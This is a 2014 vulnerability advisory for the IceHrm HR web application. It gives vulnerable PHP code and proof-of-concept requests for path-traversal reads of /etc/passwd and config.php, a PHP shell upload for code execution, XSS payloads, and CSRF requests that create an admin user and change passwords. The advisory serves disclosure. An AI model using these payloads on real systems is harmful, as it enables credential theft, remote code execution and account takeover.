IceHrm <=7.1 Multiple Vulnerabilities Vendor: IceHRM Product web page: http://www.icehrm.com Affected version: <= 7.1 Summary: IceHrm is Human Resource Management web software for small and medium sized organizations. The software is written in PHP. It has community (free), commercial and hosted (cloud) solution. Desc: IceHrm <= 7.1 suffers from multiple vulnerabilities including Local File Inclusion, Cross-Site Scripting, Malicious File Upload, Cross-Site Request Forgery and Code Execution. Tested on: Apache/2.2.15 (Unix) PHP/5.3.3 MySQL 5.1.73 Vulnerabilities discovered by Stefan 'sm' Petrushevski @zeroscience Advisory ID: ZSL-2014-5215 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5215.php 01.12.2014 --- 1. Local File Inclusion (LFI) ##################################################### File: app/index.php Vulnerable code: ---- snip ---- include APP_BASE_PATH.'/'.$group.'/'.$name.'/index.php'; app/?g=../&n=../../../../etc/passwd%00 ---- snip ---- Proof of Concept (PoC): http://zsltest/icehrm/app/?g=../&n=../../../../etc/passwd%00 Severity: CRITICAL ##################################################### 2. Local File Inclusion (LFI) ##################################################### File: service.php Vulnerable code: ---- snip ---- if($action == 'download'){ $fileName = $_REQUEST['file']; $fileName = CLIENT_BASE_PATH.'data/'.$fileName; header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='.basename($fileName)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($fileName)); ob_clean(); flush(); readfile($fileName); ---- snip ---- Proof of Concept (PoC): http://zsltest/icehrm/app/service.php?a=download&file=../config.php Severity: CRITICAL ##################################################### 3. Malicious File Upload / Code Execution ##################################################### File: fileupload.php Vulnerable code: ---- snip ---- //Generate File Name $saveFileName = $_POST['file_name']; if(empty($saveFileName) || $saveFileName == "_NEW_"){ $saveFileName = microtime(); $saveFileName = str_replace(".", "-", $saveFileName); } $file = new File(); $file->Load("name = ?",array($saveFileName)); // list of valid extensions, ex. array("jpeg", "xml", "bmp") $allowedExtensions = explode(',', "csv,doc,xls,docx,xlsx,txt,ppt,pptx,rtf,pdf,xml,jpg,bmp,gif,png,jpeg"); // max file size in bytes $sizeLimit =MAX_FILE_SIZE_KB * 1024; $uploader = new qqFileUploader($allowedExtensions, $sizeLimit); $result = $uploader->handleUpload(CLIENT_BASE_PATH.'data/',$saveFileName); // to pass data through iframe you will need to encode all html tags if($result['success'] == 1){ $file->name = $saveFileName; $file->filename = $result['filename']; $file->employee = $_POST['user']=="_NONE_"?null:$_POST['user']; $file->file_group = $_POST['file_group']; $file->Save(); $result['data'] = CLIENT_BASE_URL.'data/'.$result['filename']; $result['data'] .= "|".$saveFileName; $result['data'] .= "|".$file->id; } ---- snip ---- Proof of Concept (PoC) method: 1. Change the 'file_name' request parameter in desired filename. The file will be saved in 'data' folder. Example: file_name = dsadsa.php ==will be saved in==> data/dsadsa.php.txt 2. Create a malicious file (php shell) save it with .txt extension 3. Upload the malicious file (php shell) via the upload form in fileupload_page.php. The file will appear in &#8216;data&#8217; folder as dsadsa.php.txt. 4. Access the file &#8211; http://zsltest/icehrm/data/dsadsa.php.txt to execute the php code. PoC example: 1. http://zsltest/icehrm/app/fileupload_page.php?id=xxx.php&msg=Upload%20Attachment&file_group=EmployeeDocument&file_type=all&user=1 2. xxx.txt contents: <?php phpinfo(); ?> 3. Upload the filename 4. Access the file: Severity: CRITICAL ##################################################### 4. Cross-Site Scripting (XSS) ##################################################### File: login.php Vulnerable code: ---- snip ---- <script type="text/javascript"> var key = ""; <?php if(isset($_REQUEST['key'])){?> key = '<?=$_REQUEST['key']?>'; key = key.replace(/ /g,"+"); <?php }?> ---- snip ---- Proof of Concept (PoC): http://zsltest/icehrm/app/login.php?key=';</script><script>alert(&#8216;zsl&#8217;);</script> Severity: MEDIUM ##################################################### 5. Cross-Site Scripting (XSS) ##################################################### File: fileupload_page.php Vulnerable code: ---- snip ---- <div id="upload_form"> <form id="upload_data" method="post" action="<?=CLIENT_BASE_URL?>fileupload.php" enctype="multipart/form-data"> <input id="file_name" name="file_name" type="hidden" value="<?=$_REQUEST['id']?>"/> <input id="file_group" name="file_group" type="hidden" value="<?=$_REQUEST['file_group']?>"/> <input id="user" name="user" type="hidden" value="<?=$_REQUEST['user']?>"/> <label id="upload_status"><?=$_REQUEST['msg']?></label><input id="file" name="file" type="file" onChange="if(checkFileType('file','<?=$fileTypes?>')){uploadfile();}"></input> &#8230; ---- snip ---- Vulnerable parameters: id, file_group, user, msg Proof of Concept (PoC): http://zsltest/icehrm/fileupload_page.php?id=XXXX%22%3E%3Cscript%3Ealert(&#8216;zsl&#8217;)%3C/script%3E Severity: MEDIUM ##################################################### 6. Information Disclosure / Leaking Sensitive User Info ##################################################### Users&#8217;/employees&#8217; profile images are easily accessible in the &#8216;data&#8217; folder. Proof of Concept (PoC): http://192.168.200.119/icehrm/app/data/profile_image_1.jpg http://192.168.200.119/icehrm/app/data/profile_image_X.jpg <- x=user id Severity: LOW ##################################################### 7. Cross-Site Request Forgery (CSRF) ##################################################### All forms are vulnerable to CSRF. Documents library: http://localhost/icehrm/app/service.php POST document=2&valid_until=&status=Inactive&details=detailz&attachment=attachment_evi4t3VuKqDfyY&a=add&t=EmployeeDocument Personal info: http://localhost/icehrm/app/service.php GET t=Employee a=ca sa=get mod=modules=employees req={"map":"{\"nationality\":[\"Nationality\",\"id\",\"name\"],\"employment_status\":[\"EmploymentStatus\",\"id\",\"name\"],\"job_title\":[\"JobTitle\",\"id\",\"name\"],\"pay_grade\":[\"PayGrade\",\"id\",\"name\"],\"country\":[\"Country\",\"code\",\"name\"],\"province\":[\"Province\",\"id\",\"name\"],\"department\":[\"CompanyStructure\",\"id\",\"title\"],\"supervisor\":[\"Employee\",\"id\",\"first_name+last_name\"]}"} Add new admin user: http://localhost/icehrm/app/service.php POST username=test5&email=test5%40zeroscience.mk&employee=1&user_level=Admin&a=add&t=User Change password of user: http://localhost/icehrm/app/service.php? GET t=User a=ca sa=changePassword mod=admin=users req={"id":5,"pwd":"newpass"} Add/edit modules: http://localhost/icehrm/app/service.php POST t=Module&a=get&sm=%7B%7D&ft=&ob= Severity: LOW #####################################################